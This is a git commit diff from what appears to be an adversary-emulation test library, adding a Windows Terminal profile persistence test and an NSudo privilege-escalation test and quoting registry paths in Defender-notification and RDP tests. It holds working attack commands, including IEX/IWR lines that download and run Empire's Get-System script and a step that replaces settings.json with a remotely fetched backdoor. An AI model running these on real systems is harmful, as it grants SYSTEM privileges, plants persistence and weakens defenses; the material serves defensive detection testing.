Merge branch 'master' into 2080

2022-08-22 10:50:51 -04:00
parent 6590c9fcf0 9ddc04fc65
commit c57a3be79f
16 changed files with 661 additions and 23 deletions
@@ -262,6 +262,7 @@ defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Mov
 defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.002,Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
@@ -517,8 +518,10 @@ privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
+privilege-escalation,T1547.015,Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -743,6 +746,7 @@ persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fc
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
+persistence,T1547.015,Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
@@ -196,6 +196,7 @@ defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Mov
 defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1564.002,Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -383,6 +384,7 @@ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection v
 privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -382,6 +382,7 @@
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
@@ -800,10 +801,12 @@
 - [T1546.009 AppCert DLLs](../../T1546.009/T1546.009.md)
  - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.015 Login Items](../../T1547.015/T1547.015.md)
+  - Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
@@ -1238,7 +1241,8 @@
  - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.015 Login Items](../../T1547.015/T1547.015.md)
+  - Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
@@ -290,6 +290,7 @@
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #3: Create Hidden User in Registry [windows]
@@ -602,6 +603,7 @@
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
  - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
@@ -65,7 +65,7 @@
 |  |  | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppCert DLLs](../../T1546.009/T1546.009.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
+|  |  | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Login Items](../../T1547.015/T1547.015.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) |  |  |  |  |  |  |
 |  |  | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [DCSync](../../T1003.006/T1003.006.md) |  |  |  |  |  |  |
 |  |  | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
@@ -91,7 +91,7 @@
 |  |  | [AppCert DLLs](../../T1546.009/T1546.009.md) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SID-History Injection](../../T1134.005/T1134.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
+|  |  | [Login Items](../../T1547.015/T1547.015.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -10724,12 +10724,12 @@ defense-evasion:
      supported_platforms:
      - windows
      executor:
-        command: 'reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration
+        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration"
          /v Notification_Suppress /t REG_DWORD /d 1 /f

          '
-        cleanup_command: 'reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX
-          Configuration /v Notification_Suppress /f >nul 2>&1
+        cleanup_command: 'reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX
+          Configuration" /v Notification_Suppress /f >nul 2>&1

          '
        name: command_prompt
@@ -10743,12 +10743,12 @@ defense-evasion:
      supported_platforms:
      - windows
      executor:
-        command: 'reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v
-          fAllowToGetHelp /t REG_DWORD /d 1 /f
+        command: 'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server"
+          /v fAllowToGetHelp /t REG_DWORD /d 1 /f

          '
-        cleanup_command: 'reg delete HKLM\System\CurrentControlSet\Control\Terminal
-          Server /v fAllowToGetHelp /f >nul 2>&1
+        cleanup_command: 'reg delete "HKLM\System\CurrentControlSet\Control\Terminal
+          Server" /v fAllowToGetHelp /f >nul 2>&1

          '
        name: command_prompt
@@ -15274,6 +15274,37 @@ defense-evasion:
          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
        name: powershell
        elevation_required: true
+    - name: Launch NSudo Executable
+      auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+      description: |-
+        Launches the NSudo executable for a short period of time and then exits.
+        NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+      supported_platforms:
+      - windows
+      input_arguments:
+        nsudo_path:
+          description: Path to the NSudo bat file
+          type: Path
+          default: "$env:TEMP\\NSudo_8.2_All_Components\\NSudo_Launcher\\x64\\NSudoLG.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'NSudo.bat must exist in the specified path #{nsudo_path}
+
+          '
+        prereq_command: 'if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+          Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+          Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+          Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+      executor:
+        command: |
+          Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+          Start-Sleep -Second 5
+          Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+        name: powershell
  T1205.001:
    technique:
      x_mitre_platforms:
@@ -34482,7 +34513,53 @@ privilege-escalation:
      - 'File: File Modification'
      x_mitre_permissions_required:
      - User
-    atomic_tests: []
+      identifier: T1547.015
+    atomic_tests:
+    - name: Persistence by modifying Windows Terminal profile
+      auto_generated_guid: ec5d76ef-82fe-48da-b931-bdb25a62bc65
+      description: Modify Windows Terminal settings.json file to gain persistence.
+        [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
+      supported_platforms:
+      - windows
+      input_arguments:
+        calculator:
+          description: Test program used to imitate a maliciously called program.
+          type: String
+          default: calculator.exe
+        settings_json_def:
+          description: Default file for Windows Terminal to replace the default profile
+            with a backdoor to call another program.
+          type: Path
+          default: "~\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
+        settings_json_tmp:
+          description: Temp file for Windows Terminal.
+          type: Path
+          default: "~\\AppData\\Local\\Temp\\settings.json"
+        wt_exe:
+          description: Windows Terminal executable.
+          type: Path
+          default: "~\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\wt.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Windows Terminal must be installed
+
+          '
+        prereq_command: 'if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: '$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db
+          -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
+
+          '
+      executor:
+        command: |
+          mv #{settings_json_def} #{settings_json_tmp}
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
+          wt.exe
+        cleanup_command: |
+          mv -Force #{settings_json_tmp} #{settings_json_def}
+          taskkill /F /IM "#{calculator}" > $null
+        name: powershell
  T1134.001:
    technique:
      x_mitre_platforms:
@@ -34558,6 +34635,37 @@ privilege-escalation:
          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
        name: powershell
        elevation_required: true
+    - name: Launch NSudo Executable
+      auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+      description: |-
+        Launches the NSudo executable for a short period of time and then exits.
+        NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+      supported_platforms:
+      - windows
+      input_arguments:
+        nsudo_path:
+          description: Path to the NSudo bat file
+          type: Path
+          default: "$env:TEMP\\NSudo_8.2_All_Components\\NSudo_Launcher\\x64\\NSudoLG.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'NSudo.bat must exist in the specified path #{nsudo_path}
+
+          '
+        prereq_command: 'if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+          Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+          Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+          Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+      executor:
+        command: |
+          Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+          Start-Sleep -Second 5
+          Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+        name: powershell
  T1134.003:
    technique:
      x_mitre_platforms:
@@ -56028,7 +56136,53 @@ persistence:
      - 'File: File Modification'
      x_mitre_permissions_required:
      - User
-    atomic_tests: []
+      identifier: T1547.015
+    atomic_tests:
+    - name: Persistence by modifying Windows Terminal profile
+      auto_generated_guid: ec5d76ef-82fe-48da-b931-bdb25a62bc65
+      description: Modify Windows Terminal settings.json file to gain persistence.
+        [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
+      supported_platforms:
+      - windows
+      input_arguments:
+        calculator:
+          description: Test program used to imitate a maliciously called program.
+          type: String
+          default: calculator.exe
+        settings_json_def:
+          description: Default file for Windows Terminal to replace the default profile
+            with a backdoor to call another program.
+          type: Path
+          default: "~\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
+        settings_json_tmp:
+          description: Temp file for Windows Terminal.
+          type: Path
+          default: "~\\AppData\\Local\\Temp\\settings.json"
+        wt_exe:
+          description: Windows Terminal executable.
+          type: Path
+          default: "~\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\wt.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Windows Terminal must be installed
+
+          '
+        prereq_command: 'if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: '$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db
+          -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
+
+          '
+      executor:
+        command: |
+          mv #{settings_json_def} #{settings_json_tmp}
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
+          wt.exe
+        cleanup_command: |
+          mv -Force #{settings_json_tmp} #{settings_json_def}
+          taskkill /F /IM "#{calculator}" > $null
+        name: powershell
  T1205.001:
    technique:
      x_mitre_platforms:
@@ -1378,12 +1378,12 @@ See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe


 ```cmd
-reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration /v Notification_Suppress /t REG_DWORD /d 1 /f
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration /v Notification_Suppress /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /f >nul 2>&1
 ```


@@ -1412,12 +1412,12 @@ See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe


 ```cmd
-reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /t REG_DWORD /d 1 /f
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /f >nul 2>&1
+reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /f >nul 2>&1
 ```


@@ -584,9 +584,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration /v Notification_Suppress /t REG_DWORD /d 1 /f
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
    cleanup_command: |
-      reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration /v Notification_Suppress /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /f >nul 2>&1
    name: command_prompt
    elevation_required: true
 - name: Allow RDP Remote Assistance Feature
@@ -599,9 +599,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /t REG_DWORD /d 1 /f
+      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    cleanup_command: |
-      reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /f >nul 2>&1
+      reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /f >nul 2>&1
    name: command_prompt
    elevation_required: true
 - name: NetWire RAT Registry Key Creation
@@ -10,6 +10,8 @@ An adversary may do this when they have a specific, existing process they want t

 - [Atomic Test #2 - `SeDebugPrivilege` token duplication](#atomic-test-2---sedebugprivilege-token-duplication)

+- [Atomic Test #3 - Launch NSudo Executable](#atomic-test-3---launch-nsudo-executable)
+

 <br/>

@@ -72,4 +74,55 @@ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f



+<br/>
+<br/>
+
+## Atomic Test #3 - Launch NSudo Executable
+Launches the NSudo executable for a short period of time and then exits.
+NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| nsudo_path | Path to the NSudo bat file | Path | $env:TEMP&#92;NSudo_8.2_All_Components&#92;NSudo_Launcher&#92;x64&#92;NSudoLG.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+Start-Sleep -Second 5
+Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: NSudo.bat must exist in the specified path #{nsudo_path}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+```
+
+
+
+
 <br/>
@@ -29,3 +29,32 @@ atomic_tests:
      IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
    name: powershell
    elevation_required: true
+- name: Launch NSudo Executable
+  auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+  description: |-
+    Launches the NSudo executable for a short period of time and then exits.
+    NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+  supported_platforms:
+  - windows
+  input_arguments:
+    nsudo_path:
+      description: 'Path to the NSudo bat file'
+      type: Path
+      default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
